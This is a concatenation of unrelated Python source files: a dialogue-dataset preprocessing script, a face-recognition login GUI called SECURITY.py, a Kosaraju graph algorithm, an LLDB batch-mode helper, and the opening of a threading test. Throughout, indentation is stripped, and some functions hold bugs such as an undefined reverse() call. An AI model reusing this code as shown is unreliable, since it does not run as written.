self.origin_sample = f.readlines()
threadings = []
num = 0
for index, line in enumerate(self.origin_sample):
num += 1
start = 0
end = min(block_size, num - 1)
block_num = int(num / block_size) + 1
print('Thread Begin. ', num)
for block in range(block_num):
while self.origin_sample[end] != '\r\n' and end < num - 1:
end += 1
work = threading.Thread(
target=self.origin_sample_agent, args=(start, end, block,))
threadings.append(work)
start = end + 1
end = min(num - 1, block_size * (block + 1))
print('point 1')
for work in threadings:
work.start()
for work in threadings:
work.join()
print('Thread Over.')
return self.content, self.response
content = np.hstack(np.array(list(self.content.values())))
totalnum = len(content)
print(totalnum)
randomIndexs = unique_randomint(0, totalnum, test_size)
otherIndexs = np.setdiff1d(np.arange(totalnum), randomIndexs)
pre_content = content[otherIndexs]
test_content = content[randomIndexs]
del content
gc.collect()
response = np.hstack(np.array(list(self.response.values())))
test_response = [response[index] + '\n' + list2str(
response[unique_randomint(0, totalnum, 9, [index])]) + '\n' for index in randomIndexs]
otherIndexs = np.setdiff1d(np.arange(totalnum), randomIndexs)
pre_response = response[otherIndexs]
max_dtype = max(pre_content.dtype, pre_response.dtype)
pre_next = pre_content.astype(
max_dtype) + pre_response.astype(max_dtype)
with open(output_file + 'seq_replies.txt', 'wb') as f:
f.write(list2str(test_response))
with open(output_file + 'seq_context.txt', 'wb') as f:
f.write(list2str(test_content))
with open(output_file + 'train.txt', 'wb') as f:
f.write(list2str(pre_next))
end_time(version)
def twotime_master(self, input_file, output_file, block_size=900000, test_size=2000):
"""
by not using numpy
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
self.origin_sample = f.readlines()
threadings = []
num = 0
for index, line in enumerate(self.origin_sample):
num += 1
start = 0
end = min(block_size, num - 1)
block_num = int(num / block_size) + 1
print('Thread Begin. ', num)
for block in range(block_num):
while self.origin_sample[end] != '\r\n' and end < num - 1:
end += 1
work = threading.Thread(
target=self.origin_sample_agent, args=(start, end, block,))
threadings.append(work)
start = end + 1
end = min(num - 1, block_size * (block + 1))
print('point 1')
for work in threadings:
work.start()
for work in threadings:
work.join()
print('Thread Over.')
content = sum(list(self.content.values()), [])
response = sum(list(self.response.values()), [])
totalnum = len(content)
print(totalnum)
randomIndexs = unique_randomint(0, totalnum, test_size)
otherIndexs = np.setdiff1d(np.arange(totalnum), randomIndexs)
pre_next = [content[index] + response[index] for index in otherIndexs]
print(len(randomIndexs))
test_content = []
test_content = [content[index] for index in randomIndexs]
print(len(test_content))
test_response = []
with open(output_file + 'seq_replies.txt', 'w') as f:
for index in randomIndexs:
f.write(response[index].replace(
'\r\n', '').replace('\n', '') + '\n')
tempIndexs = unique_randomint(0, totalnum, 9, [index])[0:9]
for idx, temp in enumerate(tempIndexs):
if idx == 8:
f.write(
response[temp].replace('\r\n', '').replace('\n', '') + '\n\n')
else:
f.write(response[temp].replace(
'\r\n', '').replace('\n', '') + '\n')
print(len(test_response))
print(len(list2str(test_response).split('\n')))
# with open(output_file + 'seq_replies.txt', 'w') as f:
# f.write(list2str(test_response))
with open(output_file + 'seq_context.txt', 'w') as f:
f.write(list2str(test_content))
with open(output_file + 'train.txt', 'w') as f:
f.write(list2str(pre_next))
end_time(version)
def origin_test_master(self, input_file, output_file, block_size=100000, test_size=2000):
"""
the master of mult-Theading for get origin sample
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
self.origin_sample = f.readlines()
threadings = []
num = len(self.origin_sample)
start = 0
end = min(block_size, num - 1)
for block in range(int(num / block_size) + 1):
while self.origin_sample[end] != '\r\n' and end < num - 1:
end += 1
work = threading.Thread(
target=self.origin_sample_agent, args=(start, end, block, ))
threadings.append(work)
start = end + 1
end = min(num - 1, block_size * (block + 1))
for work in threadings:
work.start()
for work in threadings:
work.join()
content = [self.content[k] for k in sorted(self.content.keys())]
self.content = sum(content, [])
response = [self.response[k] for k in sorted(self.response.keys())]
self.response = sum(response, [])
totalnum = len(self.content)
randomlists = np.random.randint(0, totalnum, test_size)
for index in randomlists:
temp_context = self.content[index][:-
1].replace('\n', '[SEP]') + '#'
self.test.append("1#" + temp_context + self.response[index][:-1])
otherindexs = np.random.randint(0, totalnum, 9)
for otherindex in otherindexs:
while otherindex == index:
otherindex = np.random.randint(0, totalnum, 1)[0]
self.test.append("0#" + temp_context +
self.response[otherindex][:-1])
pickle.dump(self.test, open(output_file, 'wb'))
end_time(version)
def origin_sample_agent(self, start, end, block):
"""
the agent of mult-Theading for get origin sample
"""
temp_context = ''
last_index = ''
content = []
response = []
pre = []
num = 0
for index in range(start, end):
tempword = self.origin_sample[index]
if tempword == '\r\n':
num += 1
content.append(temp_context)
response.append(last_index)
# pre.append(temp_context + last_index)
temp_context = ''
last_index = ''
else:
if len(last_index):
temp_context += last_index
last_index = tempword[:-1].strip() + '\n'
self.content[block] = content
self.response[block] = response
# self.pre[block] = pre
def origin_sample_direct(self, input_file, output_file):
"""
origin sample direct no theading
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
temp_context = ''
last_index = ''
content = []
response = []
pre = []
for tempword in f:
if tempword == '\r\n':
content.append(temp_context)
response.append(last_index)
pre.append("1#" + temp_context + last_index)
temp_context = ''
else:
if len(last_index):
temp_context += (last_index + '#')
last_index = tempword[:-1].strip()
pickle.dump(pre, open(output_file, "wb"))
end_time(version)
def origin_result_direct(self, input_file1, input_file2, output_file):
"""
origin sample direct no theading
"""
version = begin_time()
pre = []
dataset = []
with codecs.open(input_file1, 'r', 'utf-8') as f:
temp_context = ''
last_index = ''
for tempword in f:
if tempword == '\r\n':
pre.append("1#" + temp_context + last_index)
temp_context = ''
last_index = ''
else:
if len(last_index):
temp_context += (last_index + '#')
last_index = tempword[:-1].strip()
with codecs.open(input_file2, 'r', 'utf-8') as f:
temp_context = []
index = 0
totalnum = len(pre)
for tempword in f:
if tempword == '\r\n':
if len(temp_context) < 9:
continue
elif len(temp_context) == 9:
if index < totalnum:
dataset.append(pre[index] + '#' + temp_context[0])
index += 1
temp_context = []
else:
index += 1
temp_context = []
else:
temp_context.append(tempword[:-1].strip())
if index < totalnum:
dataset.append(pre[index] + '#' +
tempword[:-1].replace(u'\ufeff', '').strip())
pickle.dump([pre, dataset], open(output_file, "wb"))
end_time(version)
def calculate_result(self, input_file, output_file, block_size=10):
"""
calculate result
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
with codecs.open(output_file, 'w') as outf:
results = f.readlines()
for index in range(int(len(results) / block_size)):
pre = results[index * block_size:(index + 1) * block_size]
temp_index = np.array(pre).argmax()
outf.write(str(temp_index) + '\n')
end_time(version)
def calculate_test(self, input_file, block_size=10):
"""
calculate result
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
results = f.readlines()
totalnum = int(len(results))
correctnum = 0
top3num = 0
for index in range(int(totalnum / block_size)):
pre = results[index * block_size:(index + 1) * block_size]
temp_index = np.array(pre).argmax()
top3 = np.array(pre).argsort()[-3:][::-1]
if not temp_index:
correctnum += 1
if 0 in top3:
top3num += 1
print(correctnum, top3num, int(totalnum / block_size), spend_time(version), str(
correctnum / int(totalnum / block_size))[:5], str(top3num / int(totalnum / block_size))[:5])
return str(correctnum / int(totalnum / block_size))[:5]
def embedding_test_master(self, input_file, embedding_file, block_size=10000):
"""
the master of mult-Theading for test by embedding model
"""
version = begin_time()
self.word2vec = load_bigger(embedding_file)
self.origin_sample = load_bigger(input_file)
threadings = queue.Queue()
waitthreadings = queue.Queue()
num = len(self.origin_sample)
start = 0
end = min(block_size, num - 1)
for block in range(int(num / block_size) + 1):
work = threading.Thread(
target=self.embedding_test_agent, args=(start, end, block,))
threadings.put(work)
start = end + 1
end = min(num - 1, block_size * (block + 2))
while not threadings.empty():
tempwork = threadings.get()
tempwork.start()
waitthreadings.put(tempwork)
while not waitthreadings.empty():
waitthreadings.get().join()
result = [self.wordresult[k] for k in sorted(self.wordresult.keys())]
results = sum(result, [])
totalnum = int(len(results))
correctnum = 0
top3num = 0
block_sizes = 10
for index in range(int(totalnum / block_sizes)):
pre = results[index * block_sizes:(index + 1) * block_sizes]
temp_index = np.array(pre).argmax()
top3 = np.array(pre).argsort()[-3:][::-1]
if not temp_index:
correctnum += 1
if 0 in top3:
top3num += 1
print(correctnum, top3num, int(totalnum / block_sizes), spend_time(version), str(
correctnum / int(totalnum / block_sizes))[:5], str(top3num / int(totalnum / block_sizes))[:5])
end_time(version)
def embedding_test_agent(self, start, end, block):
"""
the agent of mult-Theading for test by embedding model
"""
result = []
origin_sample = self.origin_sample
word2vec = self.word2vec
for index in range(start, end):
tempword = origin_sample[index].replace("\n", "")
parts = tempword.strip().split('#')
context = np.zeros(200)
reply = np.zeros(200)
for i in range(1, len(parts) - 1, 1):
words = parts[i].split()
for word in words:
if word in word2vec:
context += word2vec[word]
for word in parts[-1].split():
if word in word2vec:
reply += word2vec[word]
result.append(np.dot(
context, reply) / (np.linalg.norm(context, ord=2) * np.linalg.norm(reply, ord=2)))
self.wordresult[block] = result
def papp(index):
tempword = origin_sample[index]
parts = tempword.strip().split('#')
context = np.zeros(200)
reply = np.zeros(200)
for i in range(1, len(parts) - 1, 1):
words = parts[i].split()
for word in words:
if word in word2vec:
context += word2vec[word]
for word in parts[-1].split():
if word in word2vec:
reply += word2vec[word]
return np.dot(context, reply) / (np.linalg.norm(context, ord=2) * np.linalg.norm(reply, ord=2))
class GetWords(object):
"""
word2vec agent
"""
def __init__(self, dirname):
self.dirname = dirname
def __iter__(self):
with open(self.dirname, 'r') as f:
wordLists = f.readlines()
for index in wordLists:
yield index.split()
def list2str(lists):
"""
list to str
"""
return str(list(lists)).replace('\'', '').replace('\\n', '\n').replace(', ', '\n')[1:-1]
def preWord2vec(input_file, output_file):
"""
word bag construction
"""
version = begin_time()
logging.basicConfig(
format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
sentences = GetWords(input_file)
model = Word2Vec(sentences, workers=100, min_count=5, size=200)
model.save(output_file)
end_time(version)
|
SECURITY.py
|
from tkinter import *
from tkinter import ttk
from PIL import Image, ImageTk
import cv2
import numpy as np
import os
from os.path import isfile, join
from threading import Thread
from userHandler import UserData
import FACE_UNLOCKER as FU
background, textColor = 'black', '#F6FAFB'
background, textColor = textColor, background
avatarChoosen = 0
choosedAvtrImage = None
user_name = ''
user_gender = ''
try:
face_classifier = cv2.CascadeClassifier('Cascade/haarcascade_frontalface_default.xml')
except Exception as e:
print('Cascade File is missing...')
raise SystemExit
if os.path.exists('userData')==False:
os.mkdir('userData')
if os.path.exists('userData/faceData')==False:
os.mkdir('userData/faceData')
###### ROOT1 ########
def startLogin():
try:
result = FU.startDetecting()
if result:
user = UserData()
user.extractData()
userName = user.getName().split()[0]
welcLbl['text'] = 'Hi '+userName+',\nWelcome to the world of\nScience & Technology'
loginStatus['text'] = 'UNLOCKED'
loginStatus['fg'] = 'green'
faceStatus['text']='(Logged In)'
os.system('python GUIASSISTANT.py')
else:
print('Error Occurred')
except Exception as e:
print(e)
####### ROOT2 ########
def trainFace():
data_path = 'userData/faceData/'
onlyfiles = [f for f in os.listdir(data_path) if isfile(join(data_path, f))]
Training_data = []
Labels = []
for i, files in enumerate(onlyfiles):
image_path = data_path + onlyfiles[i]
images = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
Training_data.append(np.asarray(images, dtype=np.uint8))
Labels.append(i)
Labels = np.asarray(Labels, dtype=np.int32)
model = cv2.face.LBPHFaceRecognizer_create()
model.train(np.asarray(Training_data), np.asarray(Labels))
print('Model Trained Successfully !!!')
model.save('userData/trainer.yml')
print('Model Saved !!!')
def face_extractor(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_classifier.detectMultiScale(gray, 1.3, 5)
if faces is ():
return None
for (x, y, w, h) in faces:
cropped_face = img[y:y+h, x:x+w]
return cropped_face
cap = None
count = 0
def startCapturing():
global count, cap
ret, frame = cap.read()
if face_extractor(frame) is not None:
count += 1
face = cv2.resize(face_extractor(frame), (200, 200))
face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)
file_name_path = 'userData/faceData/img' + str(count) + '.png'
cv2.imwrite(file_name_path, face)
print(count)
progress_bar['value'] = count
cv2.putText(face, str(count), (50, 50), cv2.FONT_HERSHEY_COMPLEX, 1, (0,255,0), 2)
else:
pass
if count==100:
progress_bar.destroy()
lmain['image'] = defaultImg2
statusLbl['text'] = '(Face added successfully)'
cap.release()
cv2.destroyAllWindows()
Thread(target=trainFace).start()
addBtn['text'] = ' Next '
addBtn['command'] = lambda:raise_frame(root3)
return
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
frame = cv2.flip(frame, 1)
img = Image.fromarray(frame)
imgtk = ImageTk.PhotoImage(image=img)
lmain.imgtk = imgtk
lmain.configure(image=imgtk)
lmain.after(10, startCapturing)
def Add_Face():
global cap, user_name, user_gender
user_name = nameField.get()
user_gender = r.get()
if user_name != '' and user_gender!=0:
if agr.get()==1:
cap = cv2.VideoCapture(0)
startCapturing()
progress_bar.place(x=20, y=273)
statusLbl['text'] = ''
else:
statusLbl['text'] = '(Check the Condition)'
else:
statusLbl['text'] = '(Please fill the details)'
def SuccessfullyRegistered():
if avatarChoosen != 0:
gen = 'Male'
if user_gender==2: gen = 'Female'
u = UserData()
u.updateData(user_name, gen, avatarChoosen)
usernameLbl['text'] = user_name
raise_frame(root4)
def selectAVATAR(avt=0):
global avatarChoosen, choosedAvtrImage
avatarChoosen = avt
i=1
for avtr in (avtb1,avtb2,avtb3,avtb4,avtb5,avtb6,avtb7,avtb8):
if i==avt:
avtr['state'] = 'disabled'
userPIC['image'] = avtr['image']
else: avtr['state'] = 'normal'
i+=1
################################################# GUI ###############################
def raise_frame(frame):
frame.tkraise()
if __name__ == '__main__':
root = Tk()
root.title('F.R.I.D.A.Y.')
w_width, w_height = 350, 600
s_width, s_height = root.winfo_screenwidth(), root.winfo_screenheight()
x, y = (s_width/2)-(w_width/2), (s_height/2)-(w_height/2)
root.geometry('%dx%d+%d+%d' % (w_width,w_height,x,y-30)) #center location of the screen
root.configure(bg=background)
# root.attributes('-toolwindow', True)
root1 = Frame(root, bg=background)
root2 = Frame(root, bg=background)
root3 = Frame(root, bg=background)
root4 = Frame(root, bg=background)
for f in (root1, root2, root3, root4):
f.grid(row=0, column=0, sticky='news')
################################
######## MAIN SCREEN #########
################################
image1 = Image.open('extrafiles/images/home2.jpg')
image1 = image1.resize((300,250))
defaultImg1 = ImageTk.PhotoImage(image1)
dataFrame1 = Frame(root1, bd=10, bg=background)
dataFrame1.pack()
logo = Label(dataFrame1, width=300, height=250, image=defaultImg1)
logo.pack(padx=10, pady=10)
#welcome label
welcLbl = Label(root1, text='Hi there,\nWelcome to the world of\nScience & Technology', font=('Arial Bold', 15), fg='#303E54', bg=background)
welcLbl.pack(padx=10, pady=20)
#add face
loginStatus = Label(root1, text='LOCKED', font=('Arial Bold', 15), bg=background, fg='red')
loginStatus.pack(pady=(40,20))
if os.path.exists('userData/trainer.yml')==False:
loginStatus['text'] = 'Your Face is not registered'
addFace = Button(root1, text=' Register Face ', font=('Arial', 12), bg='#018384', fg='white', relief=FLAT, command=lambda:raise_frame(root2))
addFace.pack(ipadx=10)
else:
# pass
Thread(target=startLogin).start()
#status of add face
faceStatus = Label(root1, text='(Face Not Detected)', font=('Arial 10'), fg=textColor, bg=background)
faceStatus.pack(pady=5)
##################################
######## FACE ADD SCREEN #######
##################################
image2 = Image.open('extrafiles/images/defaultFace4.png')
image2 = image2.resize((300, 250))
defaultImg2 = ImageTk.PhotoImage(image2)
dataFrame2 = Frame(root2, bd=10, bg=background)
dataFrame2.pack(fill=X)
lmain = Label(dataFrame2, width=300, height=250, image=defaultImg2)
lmain.pack(padx=10, pady=10)
#Details
detailFrame2 = Frame(root2, bd=10, bg=background)
detailFrame2.pack(fill=X)
userFrame2 = Frame(detailFrame2, bd=10, width=300, height=250, relief=FLAT, bg=background)
userFrame2.pack(padx=10, pady=10)
#progress
progress_bar = ttk.Progressbar(root2, orient=HORIZONTAL, length=303, mode='determinate')
#name
nameLbl = Label(userFrame2, text='Name', font=('Arial Bold', 12), fg='#303E54', bg=background)
nameLbl.place(x=10,y=10)
nameField = Entry(userFrame2, bd=5, font=('Arial Bold', 10), width=25, relief=FLAT, bg='#D4D5D7')
nameField.focus()
nameField.place(x=80,y=10)
genLbl = Label(userFrame2, text='Gender', font=('Arial Bold', 12), fg='#303E54', bg=background)
genLbl.place(x=10,y=50)
r = IntVar()
s = ttk.Style()
s.configure('Wild.TRadiobutton', background=background, foreground=textColor, font=('Arial Bold', 10), focuscolor=s.configure(".")["background"])
genMale = ttk.Radiobutton(userFrame2, text='Male', value=1, variable=r, style='Wild.TRadiobutton', takefocus=False)
genMale.place(x=80,y=52)
genFemale = ttk.Radiobutton(userFrame2, text='Female', value=2, variable=r, style='Wild.TRadiobutton', takefocus=False)
genFemale.place(x=150,y=52)
#agreement
agr = IntVar()
sc = ttk.Style()
sc.configure('Wild.TCheckbutton', background=background, foreground='#303E54', font=('Arial Bold',10), focuscolor=sc.configure(".")["background"])
# agree = Checkbutton(userFrame2, text='I agree to use my face for Security purpose', fg=textColor, bg=background, activebackground=background, activeforeground=textColor)
agree = ttk.Checkbutton(userFrame2, text='I agree to use my Face for Security', style='Wild.TCheckbutton', takefocus=False, variable=agr)
agree.place(x=28, y=100)
#add face
addBtn = Button(userFrame2, text=' Add Face ', font=('Arial Bold', 12), bg='#01933B', fg='white', command=Add_Face, relief=FLAT)
addBtn.place(x=90, y=150)
#status of add face
statusLbl = Label(userFrame2, text='', font=('Arial 10'), fg=textColor, bg=background)
statusLbl.place(x=80, y=190)
##########################
#### AVATAR SELECTION ####
##########################
Label(root3, text="Choose Your Avatar", font=('arial', 15), bg=background, fg='#303E54').pack()
avatarContainer = Frame(root3, bg=background, width=300, height=500)
avatarContainer.pack(pady=10)
size = 100
avtr1 = Image.open('extrafiles/images/avatars/a1.png')
avtr1 = avtr1.resize((size, size))
avtr1 = ImageTk.PhotoImage(avtr1)
avtr2 = Image.open('extrafiles/images/avatars/a2.png')
avtr2 = avtr2.resize((size, size))
avtr2 = ImageTk.PhotoImage(avtr2)
avtr3 = Image.open('extrafiles/images/avatars/a3.png')
avtr3 = avtr3.resize((size, size))
avtr3 = ImageTk.PhotoImage(avtr3)
avtr4 = Image.open('extrafiles/images/avatars/a4.png')
avtr4 = avtr4.resize((size, size))
avtr4 = ImageTk.PhotoImage(avtr4)
avtr5 = Image.open('extrafiles/images/avatars/a5.png')
avtr5 = avtr5.resize((size, size))
avtr5 = ImageTk.PhotoImage(avtr5)
avtr6 = Image.open('extrafiles/images/avatars/a6.png')
avtr6 = avtr6.resize((size, size))
avtr6 = ImageTk.PhotoImage(avtr6)
avtr7 = Image.open('extrafiles/images/avatars/a7.png')
avtr7 = avtr7.resize((size, size))
avtr7 = ImageTk.PhotoImage(avtr7)
avtr8 = Image.open('extrafiles/images/avatars/a8.png')
avtr8 = avtr8.resize((size, size))
avtr8 = ImageTk.PhotoImage(avtr8)
avtb1 = Button(avatarContainer, image=avtr1, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(1))
avtb1.grid(row=0, column=0, ipadx=25, ipady=10)
avtb2 = Button(avatarContainer, image=avtr2, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(2))
avtb2.grid(row=0, column=1, ipadx=25, ipady=10)
avtb3 = Button(avatarContainer, image=avtr3, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(3))
avtb3.grid(row=1, column=0, ipadx=25, ipady=10)
avtb4 = Button(avatarContainer, image=avtr4, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(4))
avtb4.grid(row=1, column=1, ipadx=25, ipady=10)
avtb5 = Button(avatarContainer, image=avtr5, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(5))
avtb5.grid(row=2, column=0, ipadx=25, ipady=10)
avtb6 = Button(avatarContainer, image=avtr6, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(6))
avtb6.grid(row=2, column=1, ipadx=25, ipady=10)
avtb7 = Button(avatarContainer, image=avtr7, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(7))
avtb7.grid(row=3, column=0, ipadx=25, ipady=10)
avtb8 = Button(avatarContainer, image=avtr8, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(8))
avtb8.grid(row=3, column=1, ipadx=25, ipady=10)
Button(root3, text=' Submit ', font=('Arial Bold', 15), bg='#01933B', fg='white', bd=0, relief=FLAT, command=SuccessfullyRegistered).pack()
#########################################
######## SUCCESSFULL REGISTRATION #######
#########################################
userPIC = Label(root4, bg=background, image=avtr1)
userPIC.pack(pady=(40, 10))
usernameLbl = Label(root4, text="Roshan Kumar", font=('Arial Bold',15), bg=background, fg='#85AD4F')
usernameLbl.pack(pady=(0, 70))
Label(root4, text="Your account has been successfully activated!", font=('Arial Bold',15), bg=background, fg='#303E54', wraplength=300).pack(pady=10)
Label(root4, text="Launch the APP again to get started the conversation with your Personal Assistant", font=('arial',13), bg=background, fg='#A3A5AB', wraplength=350).pack()
Button(root4, text=' OK ', bg='#0475BB', fg='white',font=('Arial Bold', 18), bd=0, relief=FLAT, command=lambda:quit()).pack(pady=50)
root.iconbitmap('extrafiles/images/assistant2.ico')
raise_frame(root1)
root.mainloop()
|
KosarajuSCC.py
|
import sys
import os
from pprint import pprint
import threading
class Graph(object):
def __init__(self, filepath=None):
self._adj_list = []
self._reverse_adj_list = []
if filepath:
self._read(filepath)
def _read(self, filepath):
with open(filepath) as f:
lines = f.readlines()
lines = [l for l in lines if len(l) > 0]
for line in lines:
num1, num2 = line.split()
v_from = int(num1)
v_to = int(num2)
max_v = max(v_from, v_to)
while (len(self._adj_list) < max_v):
self._adj_list.append([])
while (len(self._reverse_adj_list) < max_v):
self._reverse_adj_list.append([])
self._adj_list[v_from - 1].append(v_to - 1)
self._reverse_adj_list[v_to - 1].append(v_from - 1)
@property
def reverse(self):
return self._reverse_adj_list
@property
def graph(self):
return self._adj_list
class KosarajuSCC(object):
def __init__(self, graph):
self.graph = graph.graph
self.graph_rev = graph.reverse
self.t = 0
self.n = len(self.graph_rev)
self.explored = [False] * self.n
self.sorted_by_finish_time = [None] * self.n
self.scc_size = 0
def _dfs_loop1(self):
self.t = 0
self.explored = [False] * self.n
self.sorted_by_finish_time = [None] * self.n
def dfs(graph_rev, i):
self.explored[i] = True
for v in graph_rev[i]:
if not self.explored[v]:
dfs(graph_rev, v)
self.sorted_by_finish_time[self.t] = i
self.t += 1
for i in reverse(range(self.n)):
if not self.explored[i]:
dfs(self.graph_rev, i)
def _dfs_loop2(self):
self.explored = [False] * len(self.graph)
res = []
def dfs(graph, i):
self.explored[i] = True
for v in graph[i]:
if not self.explored[v]:
dfs(graph, v)
self.scc_size += 1
for i in reversed(range(len(self.graph))):
if not self.explored[self.sorted_by_finish_time[i]]:
self.scc_size = 0
dfs(self.graph, self.sorted_by_finish_time[i])
res.append(self.scc_size)
return res
def kosaraju_scc_sizes(self):
self._dfs_loop1()
res = self._dfs_loop2()
return res
def main():
CURDIR = os.path.dirname(os.path.abspath(__file__))
FILEPATH = os.path.join(CURDIR, "SCC.txt")
print "start"
graph = Graph(FILEPATH)
print "read graph"
print "calculating scc sizes"
res = KosarajuSCC(graph).kosaraju_scc_sizes()
print ','.join(map(lambda x: str(x), sorted(res)[::-1][:5]))
if __name__ == '__main__':
threading.stack_size(67108864)
sys.setrecursionlimit(2 ** 20)
thread = threading.Thread(target=main)
thread.start()
|
lldb_batchmode.py
|
# Copyright 2014 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
# This script allows to use LLDB in a way similar to GDB's batch mode. That is, given a text file
# containing LLDB commands (one command per line), this script will execute the commands one after
# the other.
# LLDB also has the -s and -S commandline options which also execute a list of commands from a text
# file. However, this command are execute `immediately`: a the command of a `run` or `continue`
# command will be executed immediately after the `run` or `continue`, without waiting for the next
# breakpoint to be hit. This a command sequence like the following will not yield reliable results:
#
# break 11
# run
# print x
#
# Most of the time the `print` command will be executed while the program is still running will thus
# fail. Using this Python script, the above will work as expected.
from __future__ import print_function
import lldb
import os
import sys
import threading
import thread
import re
import time
# Set this to True for additional output
DEBUG_OUTPUT = False
def print_debug(s):
"Print something if DEBUG_OUTPUT is True"
global DEBUG_OUTPUT
if DEBUG_OUTPUT:
print("DEBUG: " + str(s))
def normalize_whitespace(s):
"Replace newlines, tabs, multiple spaces, etc with exactly one space"
return re.sub("\s+", " ", s)
def breakpoint_callback(frame, bp_loc, dict):
"""This callback is registered with every breakpoint and makes sure that the
frame containing the breakpoint location is selected"""
print("Hit breakpoint " + str(bp_loc))
# Select the frame and the thread containing it
frame.thread.process.SetSelectedThread(frame.thread)
frame.thread.SetSelectedFrame(frame.idx)
# Returning True means that we actually want to stop at this breakpoint
return True
# This is a list of breakpoints that are not registered with the breakpoint callback. The list is
# populated by the breakpoint listener and checked/emptied whenever a command has been executed
new_breakpoints = []
# This set contains all breakpoint ids that have already been registered with a callback, and is
# used to avoid hooking callbacks into breakpoints more than once
registered_breakpoints = set()
def execute_command(command_interpreter, command):
"Executes a single CLI command"
global new_breakpoints
global registered_breakpoints
res = lldb.SBCommandReturnObject()
print(command)
command_interpreter.HandleCommand(command, res)
if res.Succeeded():
if res.HasResult():
print(normalize_whitespace(res.GetOutput()), end='\n')
# If the command introduced any breakpoints, make sure to register
# them with the breakpoint
# callback
while len(new_breakpoints) > 0:
res.Clear()
breakpoint_id = new_breakpoints.pop()
if breakpoint_id in registered_breakpoints:
print_debug("breakpoint with id %s is already registered. Ignoring." %
str(breakpoint_id))
else:
print_debug("registering breakpoint callback, id = " + str(breakpoint_id))
callback_command = ("breakpoint command add -F breakpoint_callback " +
str(breakpoint_id))
command_interpreter.HandleCommand(callback_command, res)
if res.Succeeded():
print_debug("successfully registered breakpoint callback, id = " +
str(breakpoint_id))
registered_breakpoints.add(breakpoint_id)
else:
print("Error while trying to register breakpoint callback, id = " +
str(breakpoint_id))
else:
print(res.GetError())
def start_breakpoint_listener(target):
"""Listens for breakpoints being added and adds new ones to the callback
registration list"""
listener = lldb.SBListener("breakpoint listener")
def listen():
event = lldb.SBEvent()
try:
while True:
if listener.WaitForEvent(120, event):
if lldb.SBBreakpoint.EventIsBreakpointEvent(event) and \
lldb.SBBreakpoint.GetBreakpointEventTypeFromEvent(event) == \
lldb.eBreakpointEventTypeAdded:
global new_breakpoints
breakpoint = lldb.SBBreakpoint.GetBreakpointFromEvent(event)
print_debug("breakpoint added, id = " + str(breakpoint.id))
new_breakpoints.append(breakpoint.id)
except:
print_debug("breakpoint listener shutting down")
# Start the listener and let it run as a daemon
listener_thread = threading.Thread(target=listen)
listener_thread.daemon = True
listener_thread.start()
# Register the listener with the target
target.GetBroadcaster().AddListener(listener, lldb.SBTarget.eBroadcastBitBreakpointChanged)
def start_watchdog():
"""Starts a watchdog thread that will terminate the process after a certain
period of time"""
watchdog_start_time = time.clock()
watchdog_max_time = watchdog_start_time + 30
def watchdog():
while time.clock() < watchdog_max_time:
time.sleep(1)
print("TIMEOUT: lldb_batchmode.py has been running for too long. Aborting!")
thread.interrupt_main()
# Start the listener and let it run as a daemon
watchdog_thread = threading.Thread(target=watchdog)
watchdog_thread.daemon = True
watchdog_thread.start()
####################################################################################################
# ~main
####################################################################################################
if len(sys.argv) != 3:
print("usage: python lldb_batchmode.py target-path script-path")
sys.exit(1)
target_path = sys.argv[1]
script_path = sys.argv[2]
print("LLDB batch-mode script")
print("----------------------")
print("Debugger commands script is '%s'." % script_path)
print("Target executable is '%s'." % target_path)
print("Current working directory is '%s'" % os.getcwd())
# Start the timeout watchdog
start_watchdog()
# Create a new debugger instance
debugger = lldb.SBDebugger.Create()
# When we step or continue, don't return from the function until the process
# stops. We do this by setting the async mode to false.
debugger.SetAsync(False)
# Create a target from a file and arch
print("Creating a target for '%s'" % target_path)
target_error = lldb.SBError()
target = debugger.CreateTarget(target_path, None, None, True, target_error)
if not target:
print("Could not create debugging target '" + target_path + "': " +
str(target_error) + ". Aborting.", file=sys.stderr)
sys.exit(1)
# Register the breakpoint callback for every breakpoint
start_breakpoint_listener(target)
command_interpreter = debugger.GetCommandInterpreter()
try:
script_file = open(script_path, 'r')
for line in script_file:
command = line.strip()
if command == "run" or command == "r" or re.match("^process\s+launch.*", command):
# Before starting to run the program, let the thread sleep a bit, so all
# breakpoint added events can be processed
time.sleep(0.5)
if command != '':
execute_command(command_interpreter, command)
except IOError as e:
print("Could not read debugging script '%s'." % script_path, file=sys.stderr)
print(e, file=sys.stderr)
print("Aborting.", file=sys.stderr)
sys.exit(1)
finally:
script_file.close()
|
test_threads.py
|
import threading
import queue as stdlib_queue
import time
import pytest
from .. import _core
from .. import Event, CapacityLimiter, sleep
from ..testing import wait_all_tasks_blocked
from .._threads import (
to_thread_run_sync,
current_default_thread_limiter,
from_thread_run,
from_thread_run_sync,
)
from .._core.tests.test_ki import ki_self
async def test_do_in_trio_thread():
trio_thread = threading.current_thread()
async def check_case(do_in_trio_thread, fn, expected, trio_token=None):
record = []
def threadfn():
try:
record.append(("start", threading.current_thread()))
x = do_in_trio_thread(fn, record, trio_token=trio_token)
record.append(("got", x))
except BaseException as exc:
print(exc)
record.append(("error", type(exc)))
